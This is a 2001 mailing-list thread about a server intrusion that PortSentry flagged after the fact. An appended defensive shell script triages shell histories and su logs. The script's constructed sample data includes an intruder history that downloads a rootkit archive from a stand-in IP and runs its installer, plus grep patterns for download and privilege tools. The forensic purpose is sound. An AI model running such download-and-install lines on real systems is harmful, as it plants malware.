[CLUE-Tech] Fwd: Re: blitznet crack attack
Dan Harris
coronadh at coronasolutions.com
Fri Jun 15 09:13:01 MDT 2001
WOW, that's some good info, Jim. Thanks for sharing it.
What I find interesting is that this cracker went directly to the exploit
instead of portscanning the box first. If he/she had portscanned it,
portsentry would have done its job and dropped the IP. I guess this just
proves that the #1 most important security measure is to stay up to date
with OS patches!
For #1, my guess would be that it was in /root/. The logs show su sessions
being opened, so that looks like the account that was used to do all the
chmod's and install of the rootkit.
#2, most of the time, there will be nothing to check, as 99% of all script
kiddies will do a portscan first, looking for vulnerable ports. Portsentry
will block them before they ever get to a shell.
#3, I'm not up to speed with proxies, so hopefully someone else will add
some insight here...
-Dan Harris
> Greetings All,
>
> Interesting post/info on the PortSentry mailing list (see what follows) re:
> another successful crack that PortSentry caught after the fact (the
> damage was done).
>
> For Discussion:
>
> 1) The .bash_history that is being reviewed in the post... would that file
> be located in the /home/daemon directory, the root user's directory, or what?
>
> 2) If PortSentry posts an AttackAlert, what/where .bash_history files
> should be viewed and inspected to see what the cracker was up to?
>
> 3) I've seen attempts on my own system via port 1080. This is used by
> servers running as proxy servers, yes?
>
> Bonus Questions: What did the cracker do, and how did he get in? How
> could this have been prevented?
>
> -JimI.
>
> Jim Intriglia
> IT Systems and Software Developer
> www.JimIntriglia.com
>
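A worked example of the triage being discussed in this thread (Jim's questions 1 and 2, and Dan's point that the su sessions in the log point at root's history). This is an added example, not code from either post or from PortSentry: it takes a syslog with a PortSentry "attackalert" line, lists every shell history worth reading (/root/.bash_history first, then each /home/*/.bash_history), flags histories that have been nulled out, pulls the commands an intruder typically leaves behind, and correlates them with "su to root" sessions. The filesystem, the history contents and the log lines are constructed sample data; the exact PortSentry and PAM log formats are assumptions and should be matched against what your own daemons write.

```shell
#!/bin/sh
# Added example, not from the original posts. Post-AttackAlert triage:
# which history files to read, whether any were tampered with, what the
# intruder ran, and who su'd to root. Everything under $ROOTDIR and the
# log lines are constructed sample data; the PortSentry/PAM line formats
# are assumptions.
set -eu

# ---- constructed sample filesystem and log ---------------------------------
ROOTDIR=$(mktemp -d)
trap 'rm -rf "$ROOTDIR"' EXIT
mkdir -p "$ROOTDIR/root" "$ROOTDIR/home/daemon" "$ROOTDIR/home/alice" \
         "$ROOTDIR/home/bob" "$ROOTDIR/var/log"
LOG="$ROOTDIR/var/log/messages"

cat > "$ROOTDIR/root/.bash_history" <<'EOF'
w
cd /tmp
wget http://203.0.113.9/rk.tar.gz
tar xzf rk.tar.gz
cd rk && ./install
chmod 755 /usr/bin/ps
ls -la
EOF
cat > "$ROOTDIR/home/daemon/.bash_history" <<'EOF'
uname -a
su -
EOF
cat > "$ROOTDIR/home/alice/.bash_history" <<'EOF'
ls
vi notes.txt
EOF
# A classic cover-up: history redirected to /dev/null.
ln -s /dev/null "$ROOTDIR/home/bob/.bash_history"

cat > "$LOG" <<'EOF'
Jun 14 02:11:03 host portsentry[412]: attackalert: Connect from host: 10.0.0.5/10.0.0.5 to TCP port: 1080
Jun 14 02:11:09 host PAM_unix[731]: (su) session opened for user root by daemon(uid=2)
Jun 14 02:15:40 host PAM_unix[731]: (su) session closed for user root
EOF

# ---- the checks --------------------------------------------------------------
# Number of PortSentry attack alerts in the log; zero means nothing tripped.
attack_alerts() {
    grep -c 'portsentry\[[0-9]*\]: attackalert' "$1" || true
}

# Every history file worth reading: root's first, then each home directory.
# Symlinks are listed too, because a symlink to /dev/null is itself evidence.
history_files() {
    for h in "$1/root/.bash_history" "$1"/home/*/.bash_history; do
        if [ -e "$h" ] || [ -L "$h" ]; then echo "$h"; fi
    done
}

# Histories that were nulled out or emptied: a tampering sign, not "nothing happened".
tampered_histories() {
    history_files "$1" | while read -r h; do
        if [ -L "$h" ] && [ "$(readlink "$h")" = /dev/null ]; then
            echo "$h: symlink to /dev/null"
        elif [ ! -s "$h" ]; then
            echo "$h: empty"
        fi
    done
}

# Commands an intruder typically runs: downloads, unpacking, permission changes,
# privilege escalation, module/package installs. Printed as "file: command".
suspicious_commands() {
    grep -E '^(wget|curl|ftp|tar|chmod|chown|su|sudo|rpm|insmod)( |$)|/install' "$1" \
        | sed "s|^|$1: |" || true
}

# Which accounts opened an su session to root, from the PAM lines.
su_to_root() {
    grep 'session opened for user root by' "$1" \
        | sed 's/.*by \([A-Za-z_][A-Za-z0-9_-]*\).*/\1/' | sort -u || true
}

# Full triage run: only dig through histories if PortSentry actually alerted.
report() {
    n=$(attack_alerts "$2")
    echo "portsentry attack alerts in $2: $n"
    if [ "$n" -eq 0 ]; then echo "no alert, nothing to check"; return 0; fi
    echo "su sessions to root opened by: $(su_to_root "$2" | tr '\n' ' ')"
    tampered_histories "$1"
    history_files "$1" | while read -r h; do suspicious_commands "$h"; done
}
report "$ROOTDIR" "$LOG"
```

Run it as-is to see the report on the constructed data, or point `report` at `/` and `/var/log/messages` on a box you suspect. The design point is the one Dan makes: the su lines tell you which account's history to read first, and an empty or /dev/null history is a finding in its own right rather than an all-clear.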